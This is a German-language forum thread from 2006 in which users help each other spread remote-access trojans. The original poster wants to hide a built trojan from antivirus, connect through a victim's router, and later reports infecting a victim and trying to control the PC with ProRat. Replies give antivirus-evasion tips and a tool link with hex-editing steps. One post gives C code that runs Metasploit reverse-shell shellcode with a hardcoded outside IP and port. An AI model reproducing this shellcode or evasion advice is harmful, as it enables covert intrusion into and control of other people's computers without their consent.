#1 15. Mai 2006 Hallo, ich wollte mal ganz nett fragen was ich dagegen tun kann , wenn ich den gebuildeten Trojaner an jemanden verschicke , da kommt die warnung bei der jenigen person vom virus programm... man kann ja beim builder die prozesse abschalten lassen indem man sie dort einfach reinschreibt bei irgendeiner option.... Kann mir vielleicht einer tipps dafür geben? Noch eine Frage nebenbei: Wenn sich jemand gut mit viren progs auskennt , könnt ihr mit bitte die jeweiligen namen die von den viren in der Prozess leiste bei windows stehen? zB antivir.exe etc . aber halt nur von mehreren ....man weiss ja nie welches prog jemand hat... danke..wenn ich was falsches gefragt habe dann möchte ich mich hiermit entschuldigen . Werde jeden mit einer hilfreichen antwort 10er schmeissen. Danke! + Multi-Zitat Zitieren
#2 15. Mai 2006 du musst dein trojaner stealthen das heißt für die antivirus progs unsichtbar machen dann kommt bei dem auch keine warnung das is aber ziemlich schwer find ich es gibt verschiedene methoden aber nicht jede methode hilft bei jedem av naja aber dazu gibts ja genügend beiträge glaub ich wenn ned dann Google hoffe ich konnte dir bissl weiterhelfen mfg ilovevalla + Multi-Zitat Zitieren
#3 15. Mai 2006 http://rapidshare.de/files/18336540/AV_Devil_2.exe.html Wie es funktioniert, sollte sich von selbst erklären. Die gefundenen Stellen musste dann mit nem Hex-Editor etwas ändern 10er bitte! + Multi-Zitat Zitieren
#4 15. Mai 2006 Ja vielen dank für die antworten... Kann ich irgendwie den router , da es nich immer klappt mit optix zu verbinden , umgehen? Oder brauch ich da schon so andere progs ...? Ich habe schon was von steahlten und so gehört jedoch sehr wenig ahnung... 10er wurde vergeben! Danke , jedoch wenn möglich ich bräuchte noch hilfe ihr seht ja ich habe probs.. ich vergebe gerne noch 10er.... + Multi-Zitat Zitieren
#5 15. Mai 2006 es ggibt die sog reverse connection dabei connectet dich der server wenn der opfer pc online geht mfg ilovevalla + Multi-Zitat Zitieren
#6 16. Mai 2006 ja davon habe ich gehört.. genau das is es , denn es is immer der Router denk ich mal der stört...deswegen brauch ich etwas was an ihn vobei kommt... was is das woher kann ich es bekommen diese sogennanten ´´reversen connections´´ Danke! Mfg + Multi-Zitat Zitieren
#7 16. Mai 2006 die reverse connection is bei den neuen trojanern dabei integriert im tool ich würd halt mal bei google suchen mfg ilovevalla + Multi-Zitat Zitieren
#8 16. Mai 2006 wird wohl jetzt von allen gängigen avs erkannt...sollte nix mehr bringen... vlt sollte man einfach mal ne reverse shell ausprobieren ... erkennt garantiert keine av Code: #include <stdio.h> /* win32_reverse - EXITFUNC=seh LHOST=216.75.15.231 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char scode[] = "\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7b" "\x0b\x45\xb9\x83\xeb\xfc\xe2\xf4\x87\x61\xae\xf4\x93\xf2\xba\x46" "\x84\x6b\xce\xd5\x5f\x2f\xce\xfc\x47\x80\x39\xbc\x03\x0a\xaa\x32" "\x34\x13\xce\xe6\x5b\x0a\xae\xf0\xf0\x3f\xce\xb8\x95\x3a\x85\x20" "\xd7\x8f\x85\xcd\x7c\xca\x8f\xb4\x7a\xc9\xae\x4d\x40\x5f\x61\x91" "\x0e\xee\xce\xe6\x5f\x0a\xae\xdf\xf0\x07\x0e\x32\x24\x17\x44\x52" "\x78\x27\xce\x30\x17\x2f\x59\xd8\xb8\x3a\x9e\xdd\xf0\x48\x75\x32" "\x3b\x07\xce\xc9\x67\xa6\xce\xf9\x73\x55\x2d\x37\x35\x05\xa9\xe9" "\x84\xdd\x23\xea\x1d\x63\x76\x8b\x13\x7c\x36\x8b\x24\x5f\xba\x69" "\x13\xc0\xa8\x45\x40\x5b\xba\x6f\x24\x82\xa0\xdf\xfa\xe6\x4d\xbb" "\x2e\x61\x47\x46\xab\x63\x9c\xb0\x8e\xa6\x12\x46\xad\x58\x16\xea" "\x28\x48\x16\xfa\x28\xf4\x95\xd1\xa3\x40\x4a\x5e\x1d\x63\x55\x58" "\x1d\x58\xcc\x58\xee\x63\xa9\x40\xd1\x6b\x12\x46\xad\x61\x55\xe8" "\x2e\xf4\x95\xdf\x11\x6f\x23\xd1\x18\x66\x2f\xe9\x22\x22\x89\x30" "\x9c\x61\x01\x30\x99\x3a\x85\x4a\xd1\x9e\xcc\x44\x85\x49\x68\x47" "\x39\x27\xc8\xc3\x43\xa0\xee\x12\x13\x79\xbb\x0a\x6d\xf4\x30\x91" "\x84\xdd\x1e\xee\x29\x5a\x14\xe8\x11\x0a\x14\xe8\x2e\x5a\xba\x69" "\x13\xa6\x9c\xbc\xb5\x58\xba\x6f\x11\xf4\xba\x8e\x84\xdb\x2d\x5e" "\x02\xcd\x3c\x46\x0e\x0f\xba\x6f\x84\x7c\xb9\x46\xab\x63\xb5\x33" "\x7f\x54\x16\x46\xad\xf4\x95\xb9"; int main() { void (*call)() = (void*)scode; call(); return 0; } die passenden payloads gibts hier http://metasploit.com:55555 hinweis : bitte keine nervenden pms dazu ! mfg moep + Multi-Zitat Zitieren
#9 16. Mai 2006 Also ich habe jetzt schon wieder das problem beim kollegen gehabt wir haben es versucht , jedoch hat der virus prog es erkannt... ich weiss nich wie es funktionieren soll , das er es nicht erkennt ... er war gesteahlt und gepackt gebindet...ok dankeschön! + Multi-Zitat Zitieren
#10 20. Mai 2006 Hallo , habe jetzt das mit der reversen conection gemacht , ein opfer auch den trojan untergebracht... jedoch ich kann es nich mit pro rat verbinden...die ip von dem opfer steht da bei mir nur ich komm nicht drauf auf den pc...es müsste doch eigentlich gehen durch router oder nicht? Und da steht auch wenn ich da zugreifen will auf den pc und funktionen ausführen will , das ich den falschen Port benutze... Sorry das ich so nervig bin , jedoch wäre es nett wenn ihr mir noch bei der frage hier hilfreich währet. Danke im vorraus! MFG + Multi-Zitat Zitieren